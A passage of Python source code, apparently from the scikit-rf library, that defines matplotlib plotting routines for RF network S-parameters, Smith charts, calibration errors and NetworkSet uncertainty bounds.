calling\n:func:`plot_vs_frequency_generic`\n\nExamples\n--------\n>>> myntwk.plot_{}(m=1,n=0,color='r')\n\"\"\".format(prop_name, prop_name)\n # setattr(self.__class__,'plot_%s_polar'%(prop_name), \\\n setattr(self, 'plot_%s_polar'%(prop_name), plot_prop_polar)\n\n def plot_prop_rect(self,\n m=None, n=None, ax=None,\n show_legend=True, prop_name=prop_name, *args, **kwargs):\n\n # create index lists, if not provided by user\n if m is None:\n M = range(self.number_of_ports)\n else:\n M = [m]\n if n is None:\n N = range(self.number_of_ports)\n else:\n N = [n]\n\n if 'label' not in kwargs.keys():\n gen_label = True\n else:\n gen_label = False\n\n #was_interactive = plt.isinteractive\n #if was_interactive:\n # plt.interactive(False)\n\n for m in M:\n for n in N:\n # set the legend label for this trace to the networks\n # name if it exists, and they didn't pass a name key in\n # the kwargs\n if gen_label:\n if self.name is None:\n if plt.rcParams['text.usetex']:\n label_string = '$%s_{%i%i}$'%\\\n (prop_name[0].upper(),m+1,n+1)\n else:\n label_string = '%s%i%i'%\\\n (prop_name[0].upper(),m+1,n+1)\n else:\n if plt.rcParams['text.usetex']:\n label_string = self.name+', $%s_{%i%i}$'%\\\n (prop_name[0].upper(),m+1,n+1)\n else:\n label_string = self.name+', %s%i%i'%\\\n (prop_name[0].upper(),m+1,n+1)\n kwargs['label'] = label_string\n\n # plot the desired attribute vs frequency\n plot_complex_rectangular(\n z=getattr(self, prop_name)[:, m, n],\n show_legend=show_legend, ax=ax,\n *args, **kwargs)\n\n #if was_interactive:\n # plt.interactive(True)\n # plt.draw()\n # plt.show()\n\n plot_prop_rect.__doc__ = r\"\"\"\nPlot the Network attribute :attr:`{}` vs frequency.\n\nParameters\n----------\nm : int, optional\n first index of s-parameter matrix, if None will use all\nn : int, optional\n second index of the s-parameter matrix, if None will use all\nax : :class:`matplotlib.Axes` object, optional\n An existing Axes object to plot on\nshow_legend : Boolean\n draw legend or not\nattribute : string\n Network attribute to plot\ny_label : string, optional\n the y-axis label\n\n\\*args,\\**kwargs : arguments, keyword arguments\n passed to :func:`matplotlib.plot`\n\nNote\n----\nThis function is dynamically generated upon Network\ninitialization. This is accomplished by calling\n:func:`plot_vs_frequency_generic`\n\nExamples\n--------\n>>> myntwk.plot_{}(m=1,n=0,color='r')\n\"\"\".format(prop_name, prop_name)\n\n # setattr(self.__class__,'plot_%s_complex'%(prop_name), \\\n setattr(self,'plot_%s_complex'%(prop_name), \\\n plot_prop_rect)\n\n\n for func_name in COMPONENT_FUNC_DICT:\n attribute = f'{prop_name}_{func_name}'\n y_label = Y_LABEL_DICT[func_name]\n\n def plot_func(self, m=None, n=None, ax=None,\n show_legend=True, attribute=attribute,\n y_label=y_label, logx=False, pad=0, window='hamming', z0=50, *args, **kwargs):\n\n # create index lists, if not provided by user\n if m is None:\n M = range(self.number_of_ports)\n else:\n M = [m]\n if n is None:\n N = range(self.number_of_ports)\n else:\n N = [n]\n\n if 'label' not in kwargs.keys():\n gen_label = True\n else:\n gen_label = False\n\n #TODO: turn off interactive plotting for performance\n # this didnt work because it required a show()\n # to be called, which in turn, disrupted testCases\n #\n # was_interactive = plt.isinteractive\n # if was_interactive:\n # plt.interactive(False)\n for m in M:\n for n in N:\n # set the legend label for this trace to the networks\n # name if it exists, and they didn't pass a name key in\n # the kwargs\n if gen_label:\n if self.name is None:\n if plt.rcParams['text.usetex']:\n label_string = '$%s_{%i%i}$'%\\\n (attribute[0].upper(),m+1,n+1)\n else:\n label_string = '%s%i%i'%\\\n (attribute[0].upper(),m+1,n+1)\n else:\n if plt.rcParams['text.usetex']:\n label_string = self.name+', $%s_{%i%i}$'%\\\n (attribute[0].upper(),m+1,n+1)\n else:\n label_string = self.name+', %s%i%i'%\\\n (attribute[0].upper(),m+1,n+1)\n kwargs['label'] = label_string\n\n # quick and dirty way to plot step and impulse response\n if 'time_impulse' in attribute:\n xlabel = 'Time (ns)'\n x,y = self.impulse_response(pad=pad, window=window)\n # default is reflexion coefficient axis\n if attribute[0].lower() == 'z':\n # if they want impedance axis, give it to them\n y_label = 'Z (ohm)'\n y[x == 1.] = 1. + 1e-12 # solve numerical singularity\n y[x == -1.] = -1. + 1e-12 # solve numerical singularity\n y = z0 * (1+y) / (1-y)\n plot_rectangular(x=x * 1e9,\n y=y,\n x_label=xlabel,\n y_label=y_label,\n show_legend=show_legend, ax=ax,\n *args, **kwargs)\n elif 'time_step' in attribute:\n xlabel = 'Time (ns)'\n x, y = self.step_response(pad=pad, window=window)\n # default is reflexion coefficient axis\n if attribute[0].lower() == 'z':\n # if they want impedance axis, give it to them\n y_label = 'Z (ohm)'\n y[x == 1.] = 1. + 1e-12 # solve numerical singularity\n y[x == -1.] = -1. + 1e-12 # solve numerical singularity\n y = z0 * (1+y) / (1-y)\n plot_rectangular(x=x * 1e9,\n y=y,\n x_label=xlabel,\n y_label=y_label,\n show_legend=show_legend, ax=ax,\n *args, **kwargs)\n\n else:\n # plot the desired attribute vs frequency\n if 'time' in attribute:\n xlabel = 'Time (ns)'\n x = self.frequency.t_ns\n\n else:\n xlabel = 'Frequency (%s)' % self.frequency.unit\n # x = self.frequency.f_scaled\n x = self.frequency.f # always plot f, and then scale the ticks instead\n\n # scale the ticklabels according to the frequency unit and set log-scale if desired:\n if ax is None:\n ax = plt.gca()\n if logx:\n ax.set_xscale('log')\n\n scale_frequency_ticks(ax, self.frequency.unit)\n\n\n\n plot_rectangular(x=x,\n y=getattr(self, attribute)[:, m, n],\n x_label=xlabel,\n y_label=y_label,\n show_legend=show_legend, ax=ax,\n *args, **kwargs)\n #if was_interactive:\n # plt.interactive(True)\n # plt.draw()\n # #plt.show()\n\n plot_func.__doc__ = r\"\"\"\n Plot the Network attribute :attr:`%s` vs frequency.\n\n Parameters\n ----------\n m : int, optional\n first index of s-parameter matrix, if None will use all\n n : int, optional\n second index of the s-parameter matrix, if None will use all\n ax : :class:`matplotlib.Axes` object, optional\n An existing Axes object to plot on\n show_legend : Boolean\n draw legend or not\n attribute : string\n Network attribute to plot\n y_label : string, optional\n the y-axis label\n logx : Boolean, optional\n Enable logarithmic x-axis, default off\n\n \\*args,\\**kwargs : arguments, keyword arguments\n passed to :func:`matplotlib.plot`\n\n Note\n ----\n This function is dynamically generated upon Network\n initialization. This is accomplished by calling\n :func:`plot_vs_frequency_generic`\n\n Examples\n --------\n >>> myntwk.plot_%s(m=1,n=0,color='r')\n \"\"\"%(attribute,attribute)\n\n # setattr(self.__class__,'plot_%s'%(attribute), \\\n setattr(self,'plot_%s'%(attribute), \\\n plot_func)\n\n\ndef labelXAxis(self, ax: Union[plt.Axes, None] = None):\n \"\"\"\n Label the x-axis of a plot.\n\n Sets the labels of a plot using :func:`matplotlib.x_label` with\n string containing the frequency unit.\n\n Parameters\n ----------\n ax : :class:`matplotlib.Axes` or None, optional\n Axes on which to label the plot.\n Defaults is None, for the current axe\n returned by :func:`matplotlib.gca()`\n \"\"\"\n if ax is None:\n ax = plt.gca()\n ax.set_xlabel('Frequency (%s)' % self.unit)\n\n\ndef plot_v_frequency(self, y: NumberLike, *args, **kwargs):\n \"\"\"\n Plot something vs this frequency.\n\n This plots whatever is given vs. `self.f_scaled` and then\n calls `labelXAxis`.\n \"\"\"\n\n try:\n if len(npy.shape(y)) > 2:\n # perhaps the dimensions are empty, try to squeeze it down\n y = y.squeeze()\n if len(npy.shape(y)) > 2:\n # the dimensions are full, so lets loop and plot each\n for m in range(npy.shape(y)[1]):\n for n in range(npy.shape(y)[2]):\n self.plot(y[:, m, n], *args, **kwargs)\n return\n if len(y) == len(self):\n pass\n else:\n\n raise IndexError(['thing to plot doesn\\'t have same'\n ' number of points as f'])\n except(TypeError):\n y = y * npy.ones(len(self))\n\n # plt.plot(self.f_scaled, y, *args, **kwargs)\n plt.plot(self.f, y, *args, **kwargs)\n ax = plt.gca()\n scale_frequency_ticks(ax, self.unit)\n plt.autoscale(axis='x', tight=True)\n self.labelXAxis()\n\n\n## specific plotting functions\ndef plot(self, *args, **kw):\n \"\"\"\n Plot something vs frequency\n \"\"\"\n return self.frequency.plot(*args, **kw)\n\n\ndef plot_passivity(self, port=None, label_prefix=None, *args, **kwargs):\n \"\"\"\n Plot dB(diag(passivity metric)) vs frequency.\n\n Note\n ----\n This plot does not completely capture the passivity metric, which\n is a test for `unitary-ness` of the s-matrix. However, it may\n be used to display a measure of power dissipated in a network.\n\n See Also\n --------\n passivity\n \"\"\"\n name = '' if self.name is None else self.name\n\n if port is None:\n ports = range(self.nports)\n else:\n ports = [port]\n for k in ports:\n if label_prefix is None:\n label = name + ', port %i' % (k + 1)\n else:\n label = label_prefix + ', port %i' % (k + 1)\n self.frequency.plot(mf.complex_2_db(self.passivity[:, k, k]),\n label=label,\n *args, **kwargs)\n\n plt.legend()\n plt.draw()\n\n\ndef plot_reciprocity(self, db=False, *args, **kwargs):\n \"\"\"\n Plot reciprocity metric.\n\n See Also\n --------\n reciprocity\n \"\"\"\n for m in range(self.nports):\n for n in range(self.nports):\n if m > n:\n if 'label' not in kwargs.keys():\n kwargs['label'] = 'ports %i%i' % (m, n)\n y = self.reciprocity[:, m, n].flatten()\n if db:\n y = mf.complex_2_db(y)\n self.frequency.plot(y, *args, **kwargs)\n\n plt.legend()\n plt.draw()\n\n\ndef plot_reciprocity2(self, db=False, *args, **kwargs):\n \"\"\"\n Plot reciprocity metric #2.\n\n This is distance of the determinant of the wave-cascading matrix\n from unity.\n\n .. math::\n\n abs(1 - S/S^T )\n\n\n\n See Also\n --------\n reciprocity\n \"\"\"\n for m in range(self.nports):\n for n in range(self.nports):\n if m > n:\n if 'label' not in kwargs.keys():\n kwargs['label'] = 'ports %i%i' % (m, n)\n y = self.reciprocity2[:, m, n].flatten()\n if db:\n y = mf.complex_2_db(y)\n self.frequency.plot(y, *args, **kwargs)\n\n plt.legend()\n plt.draw()\n\n\ndef plot_s_db_time(self, *args, window: Union[str, float, Tuple[str, float]]=('kaiser', 6),\n normalize: bool = True, center_to_dc: bool = None, **kwargs):\n return self.windowed(window, normalize, center_to_dc).plot_s_time_db(*args,**kwargs)\n\n\n# plotting\ndef plot_s_smith(self, m=None, n=None,r=1, ax=None, show_legend=True,\\\n chart_type='z', draw_labels=False, label_axes=False, draw_vswr=None, *args,**kwargs):\n r\"\"\"\n Plots the scattering parameter on a smith chart.\n\n Plots indices `m`, `n`, where `m` and `n` can be integers or\n lists of integers.\n\n\n Parameters\n ----------\n m : int, optional\n first index\n n : int, optional\n second index\n ax : matplotlib.Axes object, optional\n axes to plot on. in case you want to update an existing\n plot.\n show_legend : boolean, optional\n to turn legend show legend of not, optional\n chart_type : ['z','y']\n draw impedance or admittance contours\n draw_labels : Boolean\n annotate chart with impedance values\n label_axes : Boolean\n Label axis with titles `Real` and `Imaginary`\n border : Boolean\n draw rectangular border around image with ticks\n draw_vswr : list of numbers, Boolean or None\n draw VSWR circles. If True, default values are used.\n\n \\*args : arguments, optional\n passed to the matplotlib.plot command\n \\*\\*kwargs : keyword arguments, optional\n passed to the matplotlib.plot command\n\n\n See Also\n --------\n plot_vs_frequency_generic - generic plotting function\n smith - draws a smith chart\n\n Examples\n --------\n >>> myntwk.plot_s_smith()\n >>> myntwk.plot_s_smith(m=0,n=1,color='b', marker='x')\n \"\"\"\n # TODO: prevent this from re-drawing smith chart if one alread\n # exists on current set of axes\n\n # get current axis if user doesnt supply and axis\n if ax is None:\n ax = plt.gca()\n\n\n if m is None:\n M = range(self.number_of_ports)\n else:\n M = [m]\n if n is None:\n N = range(self.number_of_ports)\n else:\n N = [n]\n\n if 'label' not in kwargs.keys():\n generate_label=True\n else:\n generate_label=False\n\n for m in M:\n for n in N:\n # set the legend label for this trace to the networks name if it\n # exists, and they didnt pass a name key in the kwargs\n if generate_label:\n if self.name is None:\n if plt.rcParams['text.usetex']:\n label_string = '$S_{'+repr(m+1) + repr(n+1)+'}$'\n else:\n label_string = 'S'+repr(m+1) + repr(n+1)\n else:\n if plt.rcParams['text.usetex']:\n label_string = self.name+', $S_{'+repr(m+1) + \\\n repr(n+1)+'}$'\n else:\n label_string = self.name+', S'+repr(m+1) + repr(n+1)\n\n kwargs['label'] = label_string\n\n # plot the desired attribute vs frequency\n if len (ax.patches) == 0:\n smith(ax=ax, smithR = r, chart_type=chart_type, draw_labels=draw_labels, draw_vswr=draw_vswr)\n ax.plot(self.s[:,m,n].real, self.s[:,m,n].imag, *args,**kwargs)\n\n #draw legend\n if show_legend:\n ax.legend()\n ax.axis(npy.array([-1.1,1.1,-1.1,1.1])*r)\n\n if label_axes:\n ax.set_xlabel('Real')\n ax.set_ylabel('Imaginary')\n\n\ndef plot_it_all(self, *args, **kwargs):\n r\"\"\"\n Plot dB, deg, smith, and complex in subplots.\n\n Plots the magnitude in dB in subplot 1, the phase in degrees in\n subplot 2, a smith chart in subplot 3, and a complex plot in\n subplot 4.\n\n Parameters\n ----------\n \\*args : arguments, optional\n passed to the matplotlib.plot command\n \\*\\*kwargs : keyword arguments, optional\n passed to the matplotlib.plot command\n\n See Also\n --------\n plot_s_db - plot magnitude (in dB) of s-parameters vs frequency\n plot_s_deg - plot phase of s-parameters (in degrees) vs frequency\n plot_s_smith - plot complex s-parameters on smith chart\n plot_s_complex - plot complex s-parameters in the complex plane\n\n Examples\n --------\n >>> from skrf.data import ring_slot\n >>> ring_slot.plot_it_all()\n \"\"\"\n plt.subplot(221)\n getattr(self,'plot_s_db')(*args, **kwargs)\n plt.subplot(222)\n getattr(self,'plot_s_deg')(*args, **kwargs)\n plt.subplot(223)\n getattr(self,'plot_s_smith')(*args, **kwargs)\n plt.subplot(224)\n getattr(self,'plot_s_complex')(*args, **kwargs)\n\n\ndef stylely(rc_dict: dict = {}, style_file: str = 'skrf.mplstyle'):\n \"\"\"\n Loads the rc-params from the specified file (file must be located in skrf/data).\n\n Parameters\n ----------\n rc_dict : dict, optional\n rc dict passed to :func:`matplotlib.rc`, by default {}\n style_file : str, optional\n style file, by default 'skrf.mplstyle'\n \"\"\"\n from .data import pwd # delayed to solve circular import\n mpl.style.use(os.path.join(pwd, style_file))\n mpl.rc(rc_dict)\n\n\ndef plot_calibration_errors(self, *args, **kwargs):\n \"\"\"\n Plot biased, unbiased and total error in dB scaled.\n\n See Also\n --------\n biased_error\n unbiased_error\n total_error\n \"\"\"\n port_list = self.biased_error.port_tuples\n for m,n in port_list:\n plt.figure()\n plt.title('S%i%i'%(m+1,n+1))\n self.unbiased_error.plot_s_db(m,n,**kwargs)\n self.biased_error.plot_s_db(m,n,**kwargs)\n self.total_error.plot_s_db(m,n,**kwargs)\n plt.ylim(-100,0)\n\n\ndef plot_caled_ntwks(self, attr: str = 's_smith', show_legend: bool = False, **kwargs):\n r\"\"\"\n Plot corrected calibration standards.\n\n Given that the calibration is overdetermined, this may be used\n as a heuristic verification of calibration quality.\n\n Parameters\n ----------\n attr : str\n Network property to plot, ie 's_db', 's_smith', etc.\n Default is 's_smith'\n show_legend : bool, optional\n draw a legend or not. Default is False.\n \\*\\*kwargs : kwargs\n passed to the plot method of Network\n \"\"\"\n ns = networkSet.NetworkSet(self.caled_ntwks)\n kwargs.update({'show_legend':show_legend})\n\n if ns[0].nports ==1:\n ns.__getattribute__('plot_'+attr)(0,0, **kwargs)\n elif ns[0].nports ==2:\n plt.figure(figsize = (8,8))\n for k,mn in enumerate([(0, 0), (1, 1), (0, 1), (1, 0)]):\n plt.subplot(221+k)\n plt.title('S%i%i'%(mn[0]+1,mn[1]+1))\n ns.__getattribute__('plot_'+attr)(*mn, **kwargs)\n else:\n raise NotImplementedError\n plt.tight_layout()\n\n\ndef plot_residuals(self, attr: str = 's_db', **kwargs):\n r\"\"\"\n Plot residual networks.\n\n Given that the calibration is overdetermined, this may be used\n as a metric of the calibration's *goodness of fit*\n\n Parameters\n ----------\n attr : str, optional.\n Network property to plot, ie 's_db', 's_smith', etc.\n Default is 's_db'\n \\*\\*kwargs : kwargs\n passed to the plot method of Network\n\n See Also\n --------\n Calibration.residual_networks\n \"\"\"\n\n networkSet.NetworkSet(self.residual_ntwks).__getattribute__('plot_'+attr)(**kwargs)\n\n\n# Network Set Plotting Commands\ndef animate(self, attr: str = 's_deg', ylims: Tuple = (-5, 5),\n xlims: Union[Tuple, None] = None, show: bool = True,\n savefigs: bool = False, dir_: str = '.', *args, **kwargs):\n r\"\"\"\n Animate a property of the networkset.\n\n This loops through all elements in the NetworkSet and calls\n a plotting attribute (ie Network.plot_`attr`), with given \\*args\n and \\*\\*kwargs.\n\n Parameters\n ----------\n attr : str, optional\n plotting property of a Network (ie 's_db', 's_deg', etc)\n Default is 's_deg'\n ylims : tuple, optional\n passed to ylim. needed to have consistent y-limits across frames.\n Default is (-5 ,5).\n xlims : tuple or None, optional.\n passed to xlim. Default is None.\n show : bool, optional\n show each frame as its animated. Default is True.\n savefigs : bool, optional\n save each frame as a png. Default is False.\n\n \\*args, \\*\\*kwargs :\n passed to the Network plotting function\n\n Note\n ----\n using `label=None` will speed up animation significantly,\n because it prevents the legend from drawing\n\n to create video paste this:\n\n !avconv -r 10 -i out_%5d.png -vcodec huffyuv out.avi\n\n or (depending on your ffmpeg version)\n\n !ffmpeg -r 10 -i out_%5d.png -vcodec huffyuv out.avi\n\n Examples\n --------\n >>> ns.animate('s_deg', ylims=(-5,5), label=None)\n\n \"\"\"\n was_interactive = plt.isinteractive()\n plt.ioff()\n\n for idx, k in enumerate(self):\n plt.clf()\n if 'time' in attr:\n tmp_ntwk = k.windowed()\n tmp_ntwk.__getattribute__('plot_' + attr)(*args, **kwargs)\n else:\n k.__getattribute__('plot_' + attr)(*args, **kwargs)\n if ylims is not None:\n plt.ylim(ylims)\n if xlims is not None:\n plt.xlim(xlims)\n # rf.legend_off()\n plt.draw()\n if show:\n plt.show()\n if savefigs:\n fname = os.path.join(dir_, 'out_%.5i' % idx + '.png')\n plt.savefig(fname)\n\n if savefigs:\n print('\\n\\n')\n if was_interactive:\n plt.ion()\n\n\n#------------------------------\n#\n# NetworkSet plotting functions\n#\n#------------------------------\n\ndef plot_uncertainty_bounds_component(\n self, attribute: str,\n m: Union[int, None] = None, n: Union[int, None] = None,\n type: str = 'shade', n_deviations: int = 3,\n alpha: float = .3, color_error: Union[str, None] = None,\n markevery_error: int = 20, ax: Union[plt.Axes, None] = None,\n ppf: bool = None, kwargs_error: dict = {},\n *args, **kwargs):\n r\"\"\"\n Plot mean value of a NetworkSet with +/- uncertainty bounds in an Network's attribute.\n\n This is designed to represent uncertainty in a scalar component of the s-parameter.\n for example plotting the uncertainty in the magnitude would be expressed by,\n\n .. math::\n\n mean(|s|) \\pm std(|s|)\n\n The order of mean and abs is important.\n\n\n Parameters\n ----------\n attribute : str\n attribute of Network type to analyze\n m : int or None\n first index of attribute matrix. Default is None (all)\n n : int or None\n second index of attribute matrix. Default is None (all)\n type : str\n ['shade' | 'bar'], type of plot to draw\n n_deviations : int\n number of std deviations to plot as bounds\n alpha : float\n passed to matplotlib.fill_between() command. [number, 0-1]\n color_error : str\n color of the +- std dev fill shading. Default is None.\n markevery_error : float\n tbd\n type : str\n if type=='bar', this controls frequency of error bars\n ax : matplotlib axe object\n Axes to plot on. Default is None.\n ppf : function\n post processing function. a function applied to the\n upper and lower bounds. Default is None\n kwargs_error : dict\n dictionary of kwargs to pass to the fill_between or\n errorbar plot command depending on value of type.\n \\*args, \\*\\*kwargs :\n passed to Network.plot_s_re command used to plot mean response\n\n Note\n ----\n For phase uncertainty you probably want s_deg_unwrap, or\n similar. uncertainty for wrapped phase blows up at +-pi.\n\n \"\"\"\n\n if ax is None:\n ax = plt.gca()\n\n if m is None:\n M = range(self[0].number_of_ports)\n else:\n M = [m]\n if n is None:\n N = range(self[0].number_of_ports)\n else:\n N = [n]\n\n for m in M:\n for n in N:\n\n plot_attribute = attribute\n\n ntwk_mean = self.__getattribute__('mean_'+attribute)\n ntwk_std = self.__getattribute__('std_'+attribute)\n ntwk_std.s = n_deviations * ntwk_std.s\n\n upper_bound = (ntwk_mean.s[:, m, n] + ntwk_std.s[:, m, n]).squeeze()\n lower_bound = (ntwk_mean.s[:, m, n] - ntwk_std.s[:, m, n]).squeeze()\n\n if ppf is not None:\n if type == 'bar':\n raise NotImplementedError('the \\'ppf\\' options don\\'t work correctly with the bar-type error plots')\n ntwk_mean.s = ppf(ntwk_mean.s)\n upper_bound = ppf(upper_bound)\n lower_bound = ppf(lower_bound)\n lower_bound[npy.isnan(lower_bound)] = min(lower_bound)\n if ppf in [mf.magnitude_2_db, mf.mag_2_db]: # quickfix of wrong ylabels due to usage of ppf for *_db plots\n if attribute == 's_mag':\n plot_attribute = 's_db'\n elif attribute == 's_time_mag':\n plot_attribute = 's_time_db'\n\n if type == 'shade':\n ntwk_mean.plot_s_re(ax=ax, m=m, n=n, *args, **kwargs)\n if color_error is None:\n color_error = ax.get_lines()[-1].get_color()\n ax.fill_between(ntwk_mean.frequency.f,\n lower_bound.real, upper_bound.real, alpha=alpha, color=color_error,\n **kwargs_error)\n # ax.plot(ntwk_mean.frequency.f_scaled, ntwk_mean.s[:,m,n],*args,**kwargs)\n\n elif type == 'bar':\n ntwk_mean.plot_s_re(ax=ax, m=m, n=n, *args, **kwargs)\n if color_error is None:\n color_error = ax.get_lines()[-1].get_color()\n ax.errorbar(ntwk_mean.frequency.f[::markevery_error],\n ntwk_mean.s_re[:, m, n].squeeze()[::markevery_error],\n yerr=ntwk_std.s_mag[:, m, n].squeeze()[::markevery_error],\n color=color_error, **kwargs_error)\n\n else:\n raise(ValueError('incorrect plot type'))\n\n ax.set_ylabel(Y_LABEL_DICT.get(plot_attribute[2:], '')) # use only the function of the attribute\n scale_frequency_ticks(ax, ntwk_mean.frequency.unit)\n ax.axis('tight')\n\n\ndef plot_minmax_bounds_component(self, attribute: str, m: int = 0, n: int = 0,\n type: str = 'shade', n_deviations: int = 3,\n alpha: float = .3, color_error: Union[str, None] = None,\n markevery_error: int = 20, ax: Union[plt.Axes, None] = None,\n ppf: bool = None, kwargs_error: dict = {},\n *args, **kwargs):\n r\"\"\"\n Plots mean value of the NetworkSet with +/- uncertainty bounds in an Network's attribute.\n\n This is designed to represent uncertainty in a scalar component of the s-parameter. For example\n plotting the uncertainty in the magnitude would be expressed by\n\n .. math::\n\n mean(|s|) \\pm std(|s|)\n\n The order of mean and abs is important.\n\n Parameters\n ----------\n attribute : str\n attribute of Network type to analyze\n m : int\n first index of attribute matrix\n n : int\n second index of attribute matrix\n type : str\n ['shade' | 'bar'], type of plot to draw\n n_deviations : int\n number of std deviations to plot as bounds\n alpha : float\n passed to matplotlib.fill_between() command. [number, 0-1]\n color_error : str\n color of the +- std dev fill shading. Default is None.\n markevery_error : float\n tbd\n type : str\n if type=='bar', this controls frequency of error bars\n ax : matplotlib axe object\n Axes to plot on. Default is None.\n ppf : function\n post processing function. a function applied to the\n upper and lower bounds. Default is None\n kwargs_error : dict\n dictionary of kwargs to pass to the fill_between or\n errorbar plot command depending on value of type.\n \\*args, \\*\\*kwargs :\n passed to Network.plot_s_re command used to plot mean response\n\n Note\n ----\n For phase uncertainty you probably want s_deg_unwrap, or\n similar. Uncertainty for wrapped phase blows up at +-pi.\n\n \"\"\"\n\n if ax is None:\n ax = plt.gca()\n\n ntwk_mean = self.__getattribute__('mean_'+attribute)\n ntwk_std = self.__getattribute__('std_'+attribute)\n\n lower_bound = self.__getattribute__('min_'+attribute).s_re[:,m,n].squeeze()\n upper_bound = self.__getattribute__('max_'+attribute).s_re[:,m,n].squeeze()\n\n if ppf is not None:\n if type =='bar':\n raise NotImplementedError('the \\'ppf\\' options don\\'t work correctly with the bar-type error plots')\n ntwk_mean.s = ppf(ntwk_mean.s)\n upper_bound = ppf(upper_bound)\n lower_bound = ppf(lower_bound)\n lower_bound[npy.isnan(lower_bound)]=min(lower_bound)\n if ppf in [mf.magnitude_2_db, mf.mag_2_db]: # quickfix of wrong ylabels due to usage of ppf for *_db plots\n if attribute == 's_mag':\n attribute = 's_db'\n elif attribute == 's_time_mag':\n attribute = 's_time_db'\n\n if type == 'shade':\n ntwk_mean.plot_s_re(ax=ax,m=m,n=n,*args, **kwargs)\n if color_error is None:\n color_error = ax.get_lines()[-1].get_color()\n ax.fill_between(ntwk_mean.frequency.f,\n lower_bound, upper_bound, alpha=alpha, color=color_error,\n **kwargs_error)\n #ax.plot(ntwk_mean.frequency.f_scaled,ntwk_mean.s[:,m,n],*args,**kwargs)\n elif type =='bar':\n raise (NotImplementedError)\n ntwk_mean.plot_s_re(ax=ax, m=m, n=n, *args, **kwargs)\n if color_error is None:\n color_error = ax.get_lines()[-1].get_color()\n ax.errorbar(ntwk_mean.frequency.f[::markevery_error],\n ntwk_mean.s_re[:,m,n].squeeze()[::markevery_error],\n yerr=ntwk_std.s_mag[:,m,n].squeeze()[::markevery_error],\n color=color_error,**kwargs_error)\n\n else:\n raise(ValueError('incorrect plot type'))\n\n ax.set_ylabel(Y_LABEL_DICT.get(attribute[2:], '')) # use only the function of the attribute\n scale_frequency_ticks(ax, ntwk_mean.frequency.unit)\n ax.axis('tight')\n\n\ndef plot_uncertainty_bounds_s_db(self, *args, **kwargs):\n \"\"\"\n Call ``plot_uncertainty_bounds(attribute='s_mag','ppf':mf.magnitude_2_db*args,**kwargs)``.\n\n See plot_uncertainty_bounds for help.\n\n \"\"\"\n kwargs.update({'attribute':'s_mag','ppf':mf.magnitude_2_db})\n self.plot_uncertainty_bounds_component(*args,**kwargs)\n\ndef plot_minmax_bounds_s_db(self, *args, **kwargs):\n \"\"\"\n Call ``plot_uncertainty_bounds(attribute= 's_mag','ppf':mf.magnitude_2_db*args,**kwargs)``.\n\n See plot_uncertainty_bounds for help.\n\n \"\"\"\n kwargs.update({'attribute':'s_mag','ppf':mf.magnitude_2_db})\n self.plot_minmax_bounds_component(*args,**kwargs)\n\ndef plot_minmax_bounds_s_db10(self, *args, **kwargs):\n \"\"\"\n Call ``plot_uncertainty_bounds(attribute= 's_mag','ppf':mf.magnitude_2_db*args,**kwargs)``.\n\n see plot_uncertainty_bounds for help\n\n \"\"\"\n kwargs.update({'attribute':'s_mag','ppf':mf.mag_2_db10})\n self.plot_minmax_bounds_component(*args,**kwargs)\n\ndef plot_uncertainty_bounds_s_time_db(self, *args, **kwargs):\n \"\"\"\n Call ``plot_uncertainty_bounds(attribute= 's_mag','ppf':mf.magnitude_2_db*args,**kwargs)``.\n\n See plot_uncertainty_bounds for help.\n\n \"\"\"\n kwargs.update({'attribute':'s_time_mag','ppf':mf.magnitude_2_db})\n self.plot_uncertainty_bounds_component(*args,**kwargs)\n\ndef plot_minmax_bounds_s_time_db(self, *args, **kwargs):\n \"\"\"\n Call ``plot_uncertainty_bounds(attribute= 's_mag','ppf':mf.magnitude_2_db*args,**kwargs)``.\n\n See plot_uncertainty_bounds for help.\n\n \"\"\"\n kwargs.update({'attribute':'s_time_mag','ppf':mf.magnitude_2_db})\n self.plot_minmax_bounds_component(*args, **kwargs)\n\ndef plot_uncertainty_decomposition(self, m: int = 0, n: int = 0):\n \"\"\"\n Plot the total and component-wise uncertainty.\n\n Parameters\n ----------\n m : int\n first s-parameters index\n n :\n second s-parameter index\n\n \"\"\"\n if self.name is not None:\n plt.title(r'Uncertainty Decomposition: %s $S_{%i%i}$'%(self.name,m,n))\n self.std_s.plot_s_mag(label='Distance', m=m,n=n)\n self.std_s_re.plot_s_mag(label='Real', m=m,n=n)\n self.std_s_im.plot_s_mag(label='Imaginary', m=m,n=n)\n self.std_s_mag.plot_s_mag(label='Magnitude', m=m,n=n)\n self.std_s_arcl.plot_s_mag(label='Arc-length', m=m,n=n)\n\ndef plot_uncertainty_bounds_s(self, multiplier: float = 200, *args, **kwargs):\n \"\"\"\n Plot complex uncertainty bounds plot on smith chart.\n\n This function plots the complex uncertainty of a NetworkSet\n as circles on the smith chart. At each frequency a circle\n with radii proportional to the complex standard deviation\n of the set at that frequency is drawn. Due to the fact that\n the `markersize` argument is in pixels, the radii can scaled by\n the input argument `multiplier`.\n\n default kwargs are\n {\n 'marker':'o',\n 'color':'b',\n 'mew':0,\n 'ls':'',\n 'alpha':.1,\n 'label':None,\n }\n\n Parameters\n ----------\n multiplier : float\n controls the circle sizes, by multiples of the standard\n deviation.\n\n \"\"\"\n default_kwargs = {\n 'marker':'o',\n 'color':'b',\n 'mew':0,\n 'ls':'',\n 'alpha':.1,\n 'label':None,\n }\n default_kwargs.update(**kwargs)\n\n if plt.isinteractive():\n was_interactive = True\n plt.interactive(0)\n else:\n was_interactive = False\n\n [self.mean_s[k].plot_s_smith(*args, ms = self.std_s[k].s_mag*multiplier, **default_kwargs) for k in range(len(self[0]))]\n\n if was_interactive:\n plt.interactive(1)\n plt.draw()\n plt.show()\n\ndef plot_logsigma(self, label_axis: bool = True, *args,**kwargs):\n r\"\"\"\n Plot the uncertainty for the set in units of log-sigma.\n\n Log-sigma is the complex standard deviation, plotted in units\n of dB's.\n\n Parameters\n ----------\n label_axis : bool, optional\n Default is True.\n \\*args, \\*\\*kwargs : arguments\n passed to self.std_s.plot_s_db()\n \"\"\"\n self.std_s.plot_s_db(*args,**kwargs)\n if label_axis:\n plt.ylabel('Standard Deviation(dB)')\n\n\ndef signature(self, m: int = 0, n: int = 0, component: str = 's_mag',\n vmax: Union[Number, None] = None, vs_time: bool = False,\n cbar_label: Union[str, None] = None,\n *args, **kwargs):\n r\"\"\"\n Visualization of a NetworkSet.\n\n Creates a colored image representing the some component\n of each Network in the NetworkSet, vs frequency.\n\n Parameters\n ------------\n m : int, optional\n first s-parameters index. Default is 0.\n n : int, optional\n second s-parameter index. Default is 0.\n component : ['s_mag','s_db','s_deg' ..]\n scalar component of Network to visualize. should\n be a property of the Network object.\n vmax : number or None.\n 